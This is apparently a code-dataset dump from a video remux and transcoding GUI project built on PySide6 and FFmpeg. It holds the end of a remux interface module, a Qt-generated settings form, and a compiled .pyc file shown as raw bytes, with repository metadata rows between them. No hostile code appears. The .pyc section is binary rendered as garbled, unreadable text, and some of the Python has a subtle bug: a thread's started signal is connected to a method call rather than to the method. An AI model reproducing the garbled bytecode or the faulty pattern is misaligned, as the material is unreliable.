overwrite) def mulEx_video(self, input, output, action, overwrite='-y'): self.ffmpeg_instance = FFmpeg(self.ffmpeg_path, interrupt_flag=self._interrupted_flag, callback=self.interrupted_callback) # 实例化FFmpegApi self.ffmpeg_instance.mulEx_video(input, output, action, overwrite) # 继承自QThread的子类,用于后台执行任务的线程类 class WorkerThread(QThread): def __init__(self, worker): super().__init__() self.worker = worker self.worker.interrupted.connect(self.handle_interrupt) # 任务被中断时停止线程 def run(self): try: self.worker.run_ffmpeg_task() except Exception as e: logger.error(f"Error occurred while running {self.worker.task_type} task: {e}") def handle_interrupt(self): self.quit() # 停止线程 class RemuxInterface(QWidget, Ui_remuxInterface): def __init__(self, parent=None): super().__init__(parent=parent) self.setupUi(self) self.init_variables() # self.init_action() self.init_print() self.bind() # 必须给子界面设置全局唯一的对象名 # Init_variables def init_variables(self): # file self.input_file_args = [] self.output_file_args = [] # 循环 self.i = 0 self.is_paused = False # Init_action # def init_action(self): # Init_print def init_print(self): logger.debug("remuxInterface is initialized") # 直接使用导入的全局日志记录器 # Bind Event def bind(self): # file operation self.remuxIFinputfile.clicked.connect(self.select_input_file) self.remuxIFoutputfolder.clicked.connect(self.select_output_folder) self.remuxIFinputclear.clicked.connect(self.clear_input_file) # self.remuxpushButton_2.clicked.connect(lambda: self.norEx('V')) # self.remuxpushButton_3.clicked.connect(lambda: self.norEx('A')) # self.remuxpushButton_5.clicked.connect(lambda: self.mulEx('V')) # self.remuxpushButton_6.clicked.connect(lambda: self.mulEx('A1')) # self.remuxpushButton_4.clicked.connect(lambda: self.mulEx('A2')) # self.remuxpushButton_7.clicked.connect(lambda: self.mulEx('A3')) # self.remuxpushButton_10.clicked.connect(lambda: self.mulEx('A4')) # self.remuxpushButton_8.clicked.connect(lambda: self.mulEx('S1')) # self.remuxpushButton_9.clicked.connect(lambda: self.mulEx('S2')) # remux operation self.remuxpushButton.clicked.connect(self.remux) # File_operation def select_input_file(self): self.append_input_file_args, _ = QFileDialog.getOpenFileNames(self, "选择输入文件", "", "All Files (*)") for file_path in self.append_input_file_args: if file_path not in self.input_file_args: self.input_file_args.append(file_path) item = QListWidgetItem(file_path) self.remuxIFinputlist.addItem(item) def select_output_folder(self): if self.input_file_args != []: output_folder = QFileDialog.getExistingDirectory(self, "选择输出文件夹", "") # 选择输出文件夹 if output_folder != '': # 输出文件夹不为空且输出文件夹与输入文件夹不同 self.output_file_args = [os.path.join(output_folder, os.path.basename(file_path)) for file_path in self.input_file_args] # 获得输出文件,输出文件名与输入文件名相同 self.remuxIFoutputfolder.setText(output_folder) else: self.remuxIFoutputfolder.setText('选择输出文件夹') else: MessageBox("警告", "请先选择输入文件!", parent=self).exec() def clear_input_file(self): self.input_file_args = [] self.output_file_args = [] self.remuxIFoutputfolder.setText('选择输出文件夹') self.remuxIFinputlist.clear() def remux(self): if self.input_file_args != [] and self.output_file_args != []: self.freeze_config('正在执行转码任务,请稍等...') # 如果输入文件和输出文件都存在,则执行转码任务 while self.i < (len(self.input_file_args)): if self.is_paused: # 若暂停,则不进行循环 break input_file = self.input_file_args[self.i] output_file = self.output_file_args[self.i] # 获得输出文件名(原文件名+后缀名) if os.path.isfile(input_file): try: self.freeze_config() self.worker = Worker('remux_video', ffpath.ffmpeg_path, ffpath.ffprobe_path, input_file, output_file, self.remuxcomboBox.currentText()) # 创建worker对象 self.thread = WorkerThread(self.worker) # 创建线程对象 self.thread.started.connect(self.on_thread_started()) # 线程开始时发出信号 self.thread.finished.connect(self.worker.deleteLater) # 线程结束时删除worker对象 self.thread.finished.connect(self.thread.deleteLater) # 线程结束时删除线程对象 self.thread.finished.connect(self.remux_thread_finished) # 线程结束时开启下一个线程 self.thread.start() # 开始线程 except Exception as e: logger.error(f"Error occurred while creating worker object: {e}") else: m = MessageBox("错误", f"{input_file}不存在!", parent=self) if m.exec(): self.remux_thread_finished() # 进行下一个文件 else: self.clear_input_file() # 清空输入文件列表 break def norEx(self, param): if self.input_file_args != [] and self.output_file_args != []: self.freeze_config('正在执行转码任务,请稍等...') # 如果输入文件和输出文件都存在,则执行转码任务 while self.i < (len(self.input_file_args)): if self.is_paused: # 若暂停,则不进行循环 break input_file = self.input_file_args[self.i] output_file = self.output_file_args[self.i] + os.path.splitext(input_file)[-1] # 获得输出文件名(原文件名+后缀名) if os.path.isfile(input_file): try: self.freeze_config() self.worker = Worker('norEx_video', ffpath.ffmpeg_path, ffpath.ffprobe_path, input_file, output_file, param) # 创建worker对象 self.thread = WorkerThread(self.worker) # 创建线程对象 self.thread.started.connect(self.on_thread_started()) # 线程开始时发出信号 self.thread.finished.connect(self.worker.deleteLater) # 线程结束时删除worker对象 self.thread.finished.connect(self.thread.deleteLater) # 线程结束时删除线程对象 self.thread.finished.connect(self.remux_thread_finished) # 线程结束时开启下一个线程 self.thread.start() # 开始线程 except Exception as e: logger.error(f"Error occurred while creating worker object: {e}") else: m = MessageBox("错误", f"{input_file}不存在!", parent=self) if not m.exec(): self.clear_input_file() # 清空输入文件列表 self.i = 2666666666 # 设定一个很大的数值,使线程结束 self.norEx_thread_finished(param) # 进行下一个文件 break def mulEx(self, param): if self.input_file_args != [] and self.output_file_args != []: while self.i < (len(self.input_file_args)): if self.is_paused: # 若暂停,则不进行循环 break input_file = self.input_file_args[self.i] output_file = self.output_file_args[self.i] + os.path.splitext(input_file)[-1] # 获得输出文件名(原文件名+后缀名) if os.path.isfile(input_file): try: self.freeze_config() self.worker = Worker('mulEx_video', ffpath.ffmpeg_path, ffpath.ffprobe_path, input_file, output_file, param) # 创建worker对象 self.thread = WorkerThread(self.worker) # 创建线程对象 self.thread.started.connect(self.on_thread_started()) # 线程开始时发出信号 self.thread.finished.connect(self.worker.deleteLater) # 线程结束时删除worker对象 self.thread.finished.connect(self.thread.deleteLater) # 线程结束时删除线程对象 self.thread.finished.connect(self.remux_thread_finished) # 线程结束时开启下一个线程 self.thread.start() # 开始线程 except Exception as e: logger.error(f"Error occurred while creating worker object: {e}") else: m = MessageBox("错误", f"{input_file}不存在!", parent=self) if not m.exec(): self.clear_input_file() # 清空输入文件列表 self.i = 2666666666 # 设定一个很大的数值,使线程结束 self.mulEx_thread_finished(param) # 进行下一个文件 break def on_thread_started(self): self.is_paused = True # 开启暂停标志 logger.info(f'线程创建,暂停循环,i={self.i}') def remux_thread_finished(self): self.is_paused = False # 重置暂停标志 self.i = self.i + 1 # 开启下一个文件 if self.i < len(self.input_file_args): # 还有文件未处理 logger.info(f'{self.i-1}线程结束,开始循环,i={self.i}') self.remux() # 开启下一个线程 else: self.i = 0 # 循环计数器清零 self.unfreeze_config() MessageBox("提示", "转码任务已完成!", parent=self).exec() def norEx_thread_finished(self, param): self.is_paused = False # 重置暂停标志 self.i = self.i + 1 # 开启下一个文件 if self.i < len(self.input_file_args): # 还有文件未处理 logger.info(f'{self.i-1}线程结束,开始循环,i={self.i}') self.norEx(param) # 开启下一个线程 else: self.i = 0 # 循环计数器清零 self.unfreeze_config() MessageBox("提示", "转码任务已完成!", parent=self).exec() def mulEx_thread_finished(self, param): self.is_paused = False # 重置暂停标志 self.i = self.i + 1 # 开启下一个文件 if self.i < len(self.input_file_args): # 还有文件未处理 logger.info(f'{self.i-1}线程结束,开始循环,i={self.i}') self.mulEx(param) # 开启下一个线程 else: self.i = 0 # 循环计数器清零 self.unfreeze_config() MessageBox("提示", "转码任务已完成!", parent=self).exec() def freeze_config(self, text=''): self.remuxcomboBox.setEnabled(False) # 禁止修改视频格式 logger.info(f"Freeze config. {text}") # self.VcodecpIFconsole.appendPlainText("冻结配置") def unfreeze_config(self): self.remuxcomboBox.setEnabled(True) # 解除视频格式冻结 logger.info("Unfreeze config.") # self.VcodecpIFconsole.appendPlainText("解除冻结配置") def stop(self): if self.worker._started_flag: self.is_paused = True # 开启暂停标志 logger.info(f'暂停循环,i={self.i}') self.i = 2600000000 # 设定一个很大的数值,使线程结束 self.worker.interrupt() # 停止worker if self.worker.is_interrupted: # 停止worker self.thread.wait() # 等待线程结束 self.worker.deleteLater() # 删除worker对象 self.thread.deleteLater() # 删除线程对象 self._started_flag = False self.is_paused = False # 重置暂停标志 self.i = 0 # 循环计数器清零 self.unfreeze_config() MessageBox("警告", "转码任务已暂停!软件即将退出,请重新启动!", parent=self).exec()
16,077
Python
.py
269
39.286245
173
0.596419
wish2333/VideoExtractAndConcat
8
0
0
LGPL-2.1
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,461
Ui_settingInterface.py
wish2333_VideoExtractAndConcat/modules/Ui_settingInterface.py
# -*- coding: utf-8 -*- ################################################################################ ## Form generated from reading UI file 'settingInterface.ui' ## ## Created by: Qt User Interface Compiler version 6.7.0 ## ## WARNING! All changes made in this file will be lost when recompiling UI file! ################################################################################ from PySide6.QtCore import (QCoreApplication, QDate, QDateTime, QLocale, QMetaObject, QObject, QPoint, QRect, QSize, QTime, QUrl, Qt) from PySide6.QtGui import (QBrush, QColor, QConicalGradient, QCursor, QFont, QFontDatabase, QGradient, QIcon, QImage, QKeySequence, QLinearGradient, QPainter, QPalette, QPixmap, QRadialGradient, QTransform) from PySide6.QtWidgets import (QAbstractScrollArea, QApplication, QFrame, QGridLayout, QHBoxLayout, QLabel, QLayout, QLineEdit, QListWidgetItem, QPlainTextEdit, QPushButton, QSizePolicy, QSpacerItem, QVBoxLayout, QWidget) from qfluentwidgets import (ListWidget, PlainTextEdit, PushButton, ScrollArea) class Ui_SettingInterface(object): def setupUi(self, SettingInterface): if not SettingInterface.objectName(): SettingInterface.setObjectName(u"SettingInterface") SettingInterface.resize(1089, 757) SettingInterface.setMinimumSize(QSize(780, 0)) self.verticalLayout = QVBoxLayout(SettingInterface) self.verticalLayout.setObjectName(u"verticalLayout") self.SettingIFscrollArea = ScrollArea(SettingInterface) self.SettingIFscrollArea.setObjectName(u"SettingIFscrollArea") self.SettingIFscrollArea.setMinimumSize(QSize(760, 0)) self.SettingIFscrollArea.setFrameShape(QFrame.Shape.NoFrame) self.SettingIFscrollArea.setFrameShadow(QFrame.Shadow.Sunken) self.SettingIFscrollArea.setWidgetResizable(True) self.SettingIFfacescrollAreaWidgetContents = QWidget() self.SettingIFfacescrollAreaWidgetContents.setObjectName(u"SettingIFfacescrollAreaWidgetContents") self.SettingIFfacescrollAreaWidgetContents.setGeometry(QRect(0, 0, 1071, 739)) self.verticalLayout_3 = QVBoxLayout(self.SettingIFfacescrollAreaWidgetContents) self.verticalLayout_3.setObjectName(u"verticalLayout_3") self.SettingIFbox01 = QHBoxLayout() self.SettingIFbox01.setSpacing(20) self.SettingIFbox01.setObjectName(u"SettingIFbox01") self.SettingIFbox01.setSizeConstraint(QLayout.SizeConstraint.SetDefaultConstraint) self.SettingIFverticalLayout_4 = QVBoxLayout() self.SettingIFverticalLayout_4.setObjectName(u"SettingIFverticalLayout_4") self.SettingIFverticalLayout_4.setContentsMargins(-1, -1, 0, -1) self.SettingIFTitle1 = QLabel(self.SettingIFfacescrollAreaWidgetContents) self.SettingIFTitle1.setObjectName(u"SettingIFTitle1") sizePolicy = QSizePolicy(QSizePolicy.Policy.Maximum, QSizePolicy.Policy.Maximum) sizePolicy.setHorizontalStretch(0) sizePolicy.setVerticalStretch(0) sizePolicy.setHeightForWidth(self.SettingIFTitle1.sizePolicy().hasHeightForWidth()) self.SettingIFTitle1.setSizePolicy(sizePolicy) self.SettingIFTitle1.setMaximumSize(QSize(100, 64)) font = QFont() font.setPointSize(28) font.setBold(True) font.setKerning(True) self.SettingIFTitle1.setFont(font) self.SettingIFverticalLayout_4.addWidget(self.SettingIFTitle1) self.SettingIFTitle2 = QLabel(self.SettingIFfacescrollAreaWidgetContents) self.SettingIFTitle2.setObjectName(u"SettingIFTitle2") sizePolicy1 = QSizePolicy(QSizePolicy.Policy.Preferred, QSizePolicy.Policy.Maximum) sizePolicy1.setHorizontalStretch(0) sizePolicy1.setVerticalStretch(0) sizePolicy1.setHeightForWidth(self.SettingIFTitle2.sizePolicy().hasHeightForWidth()) self.SettingIFTitle2.setSizePolicy(sizePolicy1) self.SettingIFTitle2.setMaximumSize(QSize(100, 45)) font1 = QFont() font1.setPointSize(18) font1.setBold(True) font1.setKerning(True) self.SettingIFTitle2.setFont(font1) self.SettingIFverticalLayout_4.addWidget(self.SettingIFTitle2) self.SettingIFbox01.addLayout(self.SettingIFverticalLayout_4) self.Settinglabel = QLabel(self.SettingIFfacescrollAreaWidgetContents) self.Settinglabel.setObjectName(u"Settinglabel") self.Settinglabel.setMaximumSize(QSize(16777215, 80)) self.SettingIFbox01.addWidget(self.Settinglabel) self.SettingIFhorizontalSpacer = QSpacerItem(20, 20, QSizePolicy.Policy.Expanding, QSizePolicy.Policy.Minimum) self.SettingIFbox01.addItem(self.SettingIFhorizontalSpacer) self.verticalLayout_3.addLayout(self.SettingIFbox01) self.SettingIFbox02 = QFrame(self.SettingIFfacescrollAreaWidgetContents) self.SettingIFbox02.setObjectName(u"SettingIFbox02") self.SettingIFbox02.setEnabled(True) sizePolicy2 = QSizePolicy(QSizePolicy.Policy.Preferred, QSizePolicy.Policy.Minimum) sizePolicy2.setHorizontalStretch(0) sizePolicy2.setVerticalStretch(0) sizePolicy2.setHeightForWidth(self.SettingIFbox02.sizePolicy().hasHeightForWidth()) self.SettingIFbox02.setSizePolicy(sizePolicy2) self.SettingIFbox02.setMinimumSize(QSize(480, 145)) self.SettingIFbox02.setMaximumSize(QSize(16777215, 240)) self.SettingIFbox02.setFrameShape(QFrame.Shape.StyledPanel) self.SettingIFbox02.setFrameShadow(QFrame.Shadow.Raised) self.gridLayout = QGridLayout(self.SettingIFbox02) self.gridLayout.setObjectName(u"gridLayout") self.SettingIFinputfile = PushButton(self.SettingIFbox02) self.SettingIFinputfile.setObjectName(u"SettingIFinputfile") font2 = QFont() font2.setPointSize(12) font2.setBold(True) self.SettingIFinputfile.setFont(font2) self.gridLayout.addWidget(self.SettingIFinputfile, 0, 0, 1, 1) self.SettingIFinputclear = PushButton(self.SettingIFbox02) self.SettingIFinputclear.setObjectName(u"SettingIFinputclear") self.SettingIFinputclear.setFont(font2) self.gridLayout.addWidget(self.SettingIFinputclear, 0, 1, 1, 1) self.SettingIFoutputfolder = QPushButton(self.SettingIFbox02) self.SettingIFoutputfolder.setObjectName(u"SettingIFoutputfolder") font3 = QFont() font3.setPointSize(12) font3.setBold(False) self.SettingIFoutputfolder.setFont(font3) self.gridLayout.addWidget(self.SettingIFoutputfolder, 0, 2, 1, 1) self.SettingIFinputlist = ListWidget(self.SettingIFbox02) self.SettingIFinputlist.setObjectName(u"SettingIFinputlist") sizePolicy3 = QSizePolicy(QSizePolicy.Policy.Preferred, QSizePolicy.Policy.Preferred) sizePolicy3.setHorizontalStretch(0) sizePolicy3.setVerticalStretch(0) sizePolicy3.setHeightForWidth(self.SettingIFinputlist.sizePolicy().hasHeightForWidth()) self.SettingIFinputlist.setSizePolicy(sizePolicy3) self.SettingIFinputlist.setMinimumSize(QSize(0, 120)) self.SettingIFinputlist.setMaximumSize(QSize(16777215, 200)) self.SettingIFinputlist.setVerticalScrollBarPolicy(Qt.ScrollBarPolicy.ScrollBarAlwaysOn) self.SettingIFinputlist.setHorizontalScrollBarPolicy(Qt.ScrollBarPolicy.ScrollBarAsNeeded) self.SettingIFinputlist.setSizeAdjustPolicy(QAbstractScrollArea.SizeAdjustPolicy.AdjustIgnored) self.SettingIFinputlist.setDragEnabled(False) self.gridLayout.addWidget(self.SettingIFinputlist, 1, 0, 1, 3) self.verticalLayout_3.addWidget(self.SettingIFbox02) self.SettingIFbox03 = QHBoxLayout() self.SettingIFbox03.setObjectName(u"SettingIFbox03") self.SettingIFframe = QFrame(self.SettingIFfacescrollAreaWidgetContents) self.SettingIFframe.setObjectName(u"SettingIFframe") self.SettingIFframe.setFrameShape(QFrame.Shape.StyledPanel) self.SettingIFframe.setFrameShadow(QFrame.Shadow.Raised) self.horizontalLayout = QHBoxLayout(self.SettingIFframe) self.horizontalLayout.setObjectName(u"horizontalLayout") self.SettingIFpushButton = QPushButton(self.SettingIFframe) self.SettingIFpushButton.setObjectName(u"SettingIFpushButton") self.SettingIFpushButton.setMinimumSize(QSize(0, 30)) self.SettingIFpushButton.setFont(font2) self.horizontalLayout.addWidget(self.SettingIFpushButton) self.SettingIFlineEdit = QLineEdit(self.SettingIFframe) self.SettingIFlineEdit.setObjectName(u"SettingIFlineEdit") font4 = QFont() font4.setPointSize(12) self.SettingIFlineEdit.setFont(font4) self.horizontalLayout.addWidget(self.SettingIFlineEdit) self.SettingIFpushButton_2 = QPushButton(self.SettingIFframe) self.SettingIFpushButton_2.setObjectName(u"SettingIFpushButton_2") self.SettingIFpushButton_2.setFont(font4) self.horizontalLayout.addWidget(self.SettingIFpushButton_2) self.SettingIFbox03.addWidget(self.SettingIFframe) self.verticalLayout_3.addLayout(self.SettingIFbox03) self.SettingIFbox04 = QHBoxLayout() self.SettingIFbox04.setObjectName(u"SettingIFbox04") self.verticalLayout_3.addLayout(self.SettingIFbox04) self.SettingIFconsole = PlainTextEdit(self.SettingIFfacescrollAreaWidgetContents) self.SettingIFconsole.setObjectName(u"SettingIFconsole") sizePolicy2.setHeightForWidth(self.SettingIFconsole.sizePolicy().hasHeightForWidth()) self.SettingIFconsole.setSizePolicy(sizePolicy2) self.SettingIFconsole.setMinimumSize(QSize(640, 160)) self.SettingIFconsole.setMaximumSize(QSize(6400, 300)) self.SettingIFconsole.setUndoRedoEnabled(False) self.SettingIFconsole.setLineWrapMode(QPlainTextEdit.LineWrapMode.WidgetWidth) self.SettingIFconsole.setReadOnly(True) self.verticalLayout_3.addWidget(self.SettingIFconsole) self.SettingIFscrollArea.setWidget(self.SettingIFfacescrollAreaWidgetContents) self.verticalLayout.addWidget(self.SettingIFscrollArea) self.retranslateUi(SettingInterface) QMetaObject.connectSlotsByName(SettingInterface) # setupUi def retranslateUi(self, SettingInterface): SettingInterface.setWindowTitle(QCoreApplication.translate("SettingInterface", u"Form", None)) self.SettingIFTitle1.setText(QCoreApplication.translate("SettingInterface", u"\u8bbe\u7f6e", None)) self.SettingIFTitle2.setText(QCoreApplication.translate("SettingInterface", u"FFmpeg", None)) self.Settinglabel.setText(QCoreApplication.translate("SettingInterface", u"\u8f6f\u4ef6\u7684\u5168\u5c40\u8bbe\u7f6e", None)) self.SettingIFinputfile.setText(QCoreApplication.translate("SettingInterface", u"\u8bbe\u7f6eFFmpeg\u8def\u5f84", None)) self.SettingIFinputclear.setText(QCoreApplication.translate("SettingInterface", u"\u6062\u590d\u9ed8\u8ba4", None)) self.SettingIFoutputfolder.setText(QCoreApplication.translate("SettingInterface", u"FFmpeg\u8def\u5f84\u68c0\u6d4b\u901a\u8fc7", None)) self.SettingIFpushButton.setText(QCoreApplication.translate("SettingInterface", u"\u8bbe\u7f6eauto-editor\u8def\u5f84", None)) self.SettingIFpushButton_2.setText(QCoreApplication.translate("SettingInterface", u"auto-editor\u8def\u5f84\u68c0\u6d4b\u901a\u8fc7", None)) # retranslateUi
11,587
Python
.py
183
54.874317
148
0.758056
wish2333/VideoExtractAndConcat
8
0
0
LGPL-2.1
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,462
venco_Interface.cpython-311.pyc
wish2333_VideoExtractAndConcat/modules/__pycache__/venco_Interface.cpython-311.pyc
§ [@f¸Pãó<—ddlZddlZddlmZmZmZmZddlmZm Z m Z ddl m Z m Z mZddlmZddlmZddlmZddlmZejd ej›�¦«ejd ej›�¦«Gd „d e¦«ZGd „de¦«ZGd„de e¦«ZdS)éN)ÚQtÚQThreadÚSignalÚQObject)ÚQPixmapÚQPainterÚQColor)ÚQWidgetÚ QFileDialogÚ QMessageBox)Ú MessageBox)Úffpath)ÚFFmpeg)ÚUi_Formuåˆ�始化ffmpeg路径为:uåˆ�始化ffprobe路径为:cóP‡—eZdZe¦«Zˆfd„Zd„Zdd„Zdd„Zdd„Z ˆxZ S)ÚWorkerc󀕗t¦« ¦«||_||_||_||_dS©N)ÚsuperÚ__init__Ú task_typeÚ ffmpeg_pathÚ ffprobe_pathÚ task_args)ÚselfrrrrÚ __class__s €õPq:\Git\FFmpeg-python\code-version-pre2.1-批é‡�å�˜é€Ÿ\modules\venco_Interface.pyrzWorker.__init__s;ø€İ ‰Œ×ÒÑÔĞØ"ˆŒØ&ˆÔØ(ˆÔØ"ˆŒˆˆócóØ—|jdkr|j|j�n5|jdkr|j|j�n|jdkr|j|j�|j ¦«dS)NÚ extract_videoÚ audio_encodeÚ video_encode)rr rr!r"ÚfinishedÚemit©rs rÚrun_ffmpeg_taskzWorker.run_ffmpeg_tasks€Ø Œ>˜_Ò ,Ğ ,Ø ˆDÔ  ¤Ğ /Ğ /Ğ /Ø Œ^˜~Ò -Ğ -Ø ˆDÔ ˜tœ~Ğ .Ğ .Ğ .Ø Œ^˜~Ò -Ğ -Ø ˆDÔ ˜tœ~Ğ .Ğ .Ø Œ ×ÒÑÔĞĞĞrú-ycób—t|j¦«}| ||||||¦«dSr)rrÚextract_video_single)rÚ input_folderÚ output_folderÚ start_timeÚend_timeÚencoderÚ overwriteÚffmpeg_instances rr zWorker.extract_video&s9€İ  Ô!1Ñ2Ô2ˆØ×,Ò,¨\¸=È*ĞV^Ğ`gĞirÑsÔsĞsĞsĞsrcó^—t|j¦«}| ||||¦«dSr)rrr!©rÚ input_fileÚ output_filer.r/r0s rr!zWorker.audio_encode)ó2€İ  Ô!1Ñ2Ô2ˆØ×$Ò$ Z°¸gÀyÑQÔQĞQĞQĞQrcó^—t|j¦«}| ||||¦«dSr)rrr"r2s rr"zWorker.video_encode,r5r)r') Ú__name__Ú __module__Ú __qualname__rr#rr&r r!r"Ú __classcell__©rs@rrrs�ø€€€€€Øˆv‰xŒx€Hğ#ğ#ğ#ğ#ğ#ğ ğğğtğtğtğtğRğRğRğRğRğRğRğRğRğRğRğRrrcó$‡—eZdZˆfd„Zd„ZˆxZS)Ú WorkerThreadcóV•—t¦« ¦«||_dSr)rrÚworker)rr?rs €rrzWorkerThread.__init__2s$ø€İ ‰Œ×ÒÑÔĞØˆŒ ˆ ˆ rcó8—|j ¦«dSr)r?r&r%s rÚrunzWorkerThread.run6s€Ø Œ ×#Ò#Ñ%Ô%Ğ%Ğ%Ğ%r)r7r8r9rrAr:r;s@rr=r=1sGø€€€€€ğğğğğğ&ğ&ğ&ğ&ğ&ğ&ğ&rr=c󪇗eZdZdˆfd„ Zd„Zd„Zd„Zd„Zd„Zd„Z d „Z d „Z d „Z d „Z d „Zd„Zd„Zd„Zd„Zd„Zd„Zd„Zd„Zd„Zd„Zd„Zd„ZˆxZS)ÚVencoInterfaceNcó•—t¦« |¬¦«| |¦«| ¦«| ¦«| ¦«| ¦«dS)N©Úparent)rrÚsetupUiÚinit_variablesÚ init_actionÚ init_printÚbind)rrFrs €rrzVencoInterface.__init__:suø€İ ‰Œ×Ò ĞÑ'Ô'Ğ'Ø � Š �TÑÔĞØ ×ÒÑÔĞØ ×ÒÑÔĞØ �ŠÑÔĞØ � Š ‰ Œ ˆ ˆ ˆ rcó"—|›|›|›|›|›|›�}|Sr©)rÚvcodecÚvpresetÚ resolutionÚfpsÚacodecÚapresetÚcustom_encoders rÚchange_custom_encoderz$VencoInterface.change_custom_encoderCs,€Ø"ĞO GĞO¨ZĞO¸ĞO¸fĞOÀgĞOĞOˆØĞrcó¼—d|_d|_d|_d|_d|_d|_d|_d|_d|_d|_ d|_ d|_ d|_ dS)NÚz-vcodec libx264 z-preset medium -crf 23 z -acodec aac z -b:a 128k Ú800000Ú23) Úinput_file_pathÚoutput_file_pathÚaudio_file_pathÚsubtitle_file_pathrTrNrOrPrQrRrSÚbitrateÚqualityr%s rrHzVencoInterface.init_variablesJsf€à!ˆÔØ "ˆÔØ!ˆÔØ"$ˆÔà ˆÔØ(ˆŒ Ø/ˆŒ ؈ŒØˆŒØ$ˆŒ Ø"ˆŒ ؈Œ ؈Œ ˆ ˆ rcó¢—|j d¦«|j d¦«|j d¦«dS)NTF)ÚlineEditÚ setReadOnlyÚ lineEdit_2Ú comboBox_5Ú setEnabledr%s rrIzVencoInterface.init_action[sJ€Ø Œ ×!Ò! $Ñ'Ô'Ğ'Ø Œ×#Ò# DÑ)Ô)Ğ)Ø Œ×"Ò" 5Ñ)Ô)Ğ)Ğ)Ğ)rcóº—|j d¦«| |j|j|j|j|j|j¦«|_ |j   |j ¦«tj  tj¦«r)tj  tj¦«s0|j d¦«t%jd¦«dS|j dtj›�¦«|j dtj›�¦«t%jd¦«dS)Nu.欢è¿�使用FFmpeg-python视频处ç�†å·¥å…·ï¼�u1ffmpeg路径或ffprobe路径错误,请检查ï¼�z/ffmpeg or ffprobe error, please check the path!uffmpegåˆ�始化:uffprobeåˆ�始化:z,ffmpeg and ffprobe initialized successfully!)ÚconsoleÚappendPlainTextrUrNrOrPrQrRrSrTÚ plainTextEditÚ setPlainTextÚosÚpathÚisfilerrrÚloggingÚerrorÚinfor%s rrJzVencoInterface.init_print`s1€à Œ ×$Ò$Ğ%UÑVÔVĞVà"×8Ò8¸¼ÀdÄlĞTXÔTcĞeiÔemĞosÔozğ}Aô}IñJôJˆÔØ Ô×'Ò'¨Ô(;Ñ<Ô<Ğ<å”—’�vÔ1Ñ2Ô2ğ Jµr´w·~²~ÅfÔFYÑ7ZÔ7Zğ JØ ŒL× (Ò (Ğ)\Ñ ]Ô ]Ğ ]İ ŒMĞKÑ LÔ LĞ LĞ LĞ Là ŒL× (Ò (Ğ)R½fÔ>PĞ)RĞ)RÑ SÔ SĞ SØ ŒL× (Ò (Ğ)T½vÔ?RĞ)TĞ)TÑ UÔ UĞ Uİ ŒLĞHÑ IÔ IĞ IĞ IĞ IrcóΗ|jj |j¦«|jj |j¦«|jj |j¦«|jj |j ¦«|j j |j ¦«|j j  |j¦«|jj  |j¦«|jj  |j¦«|jj |j¦«|jj |j¦«|jj |j¦«|jj |j¦«|jj |j¦«|jj |j ¦«|j!j |j"¦«|j#j$ |j%¦«|j&j$ |j'¦«dSr)(Ú fileBtn_1ÚclickedÚconnectÚ open_file_1Ú fileBtn_2Ú open_file_2Ú fileBtn_3Ú open_file_3Ú fileBtn_4Ú open_file_4ÚpushBtnÚencodingÚ checkBox_2Ú stateChangedÚenable_resolutionÚ checkBox_3Ú enable_fpsÚcheckBoxÚenable_profileÚcomboBoxÚcurrentTextChangedÚ change_vcodecÚ comboBox_2Úchange_vpresetÚ comboBox_4Ú change_acodecÚ comboBox_3Úchange_apresetrdÚchange_profileÚspinBoxÚ valueChangedÚchange_bitrateÚ spinBox_2Úchange_qualityraÚ textChangedÚchange_resolutionrcÚ change_fpsr%s rrKzVencoInterface.bindosç€à ŒÔ×&Ò& tÔ'7Ñ8Ô8Ğ8Ø ŒÔ×&Ò& tÔ'7Ñ8Ô8Ğ8Ø ŒÔ×&Ò& tÔ'7Ñ8Ô8Ğ8Ø ŒÔ×&Ò& tÔ'7Ñ8Ô8Ğ8Ø Œ Ô×$Ò$ T¤]Ñ3Ô3Ğ3ğ ŒÔ$×,Ò,¨TÔ-CÑDÔDĞDØ ŒÔ$×,Ò,¨T¬_Ñ=Ô=Ğ=Ø Œ Ô"×*Ò*¨4Ô+>Ñ?Ô?Ğ?ğ Œ Ô(×0Ò0°Ô1CÑDÔDĞDØ ŒÔ*×2Ò2°4Ô3FÑGÔGĞGØ ŒÔ*×2Ò2°4Ô3EÑFÔFĞFØ ŒÔ*×2Ò2°4Ô3FÑGÔGĞGØ ŒÔ*×2Ò2°4Ô3FÑGÔGĞGØ Œ Ô!×)Ò)¨$Ô*=Ñ>Ô>Ğ>Ø ŒÔ#×+Ò+¨DÔ,?Ñ@Ô@Ğ@ğ Œ Ô!×)Ò)¨$Ô*@ÑAÔAĞAØ ŒÔ#×+Ò+¨D¬OÑ<Ô<Ğ<Ğ<Ğ<rcó”—tj|ddd¦«\|_}|jr!|j |j¦«dSdS)Nu选择输入文件rWõ视频文件 (*))r ÚgetOpenFileNamerZÚ lineEdit1ÚsetText©rÚ_s rruzVencoInterface.open_file_1ŒsW€İ"-Ô"=¸dĞDXĞZ\Ğ^pÑ"qÔ"qшԘaØ Ô ğ 9Ø ŒN× "Ò " 4Ô#7Ñ 8Ô 8Ğ 8Ğ 8Ğ 8ğ 9ğ 9rcó`—|j ¦«dkr@tj|d|j›d¦«\}}|r|j |¦«dSdStdd|¬¦«}| ¦«rtj d¦«dStj d¦«dS) NrWõ选择输出文件r˜õ警告õ请先选择输入文件ï¼�rEõ确认,关闭警告窗å�£õå�–消,关闭警告窗å�£) ršÚtextr ÚgetSaveFileNamerZÚ lineEdit2r›r Úexecrnrp)rr[r�Úws rrwzVencoInterface.open_file_2’sÎ€Ø Œ>× Ò Ñ Ô  BÒ &Ğ &İ"-Ô"=¸dĞDXĞ]aÔ]qĞZsğvHñ#Iô#IÑ Ğ ˜aØğ 9Ø”×&Ò&Ğ'7Ñ8Ô8Ğ8Ğ8Ğ8ğ 9ğ 9õ˜8Ğ%BÈ4ĞPÑPÔPˆAØ�vŠv‰xŒxğ :İ” Ğ8Ñ9Ô9Ğ9Ğ9Ğ9å” Ğ8Ñ9Ô9Ğ9Ğ9Ğ9rcó”—tj|ddd¦«\|_}|jr!|j |j¦«dSdS)Nu选择音频文件rWõG音频文件 (*.aac *.flac *.mp3 *.m4a *.wav *.wma *.ogg *.opus *.alac))r r™r\Ú lineEdit3r›rœs rryzVencoInterface.open_file_3 sa€İ"-Ô"=¸dĞDXĞZ\ğ_hñ#iô#iшԘaØ Ô ğ 9Ø ŒN× "Ò " 4Ô#7Ñ 8Ô 8Ğ 8Ğ 8Ğ 8ğ 9ğ 9rcór—|j ¦«dkrItj|ddd¦«\|_}|jr!|j 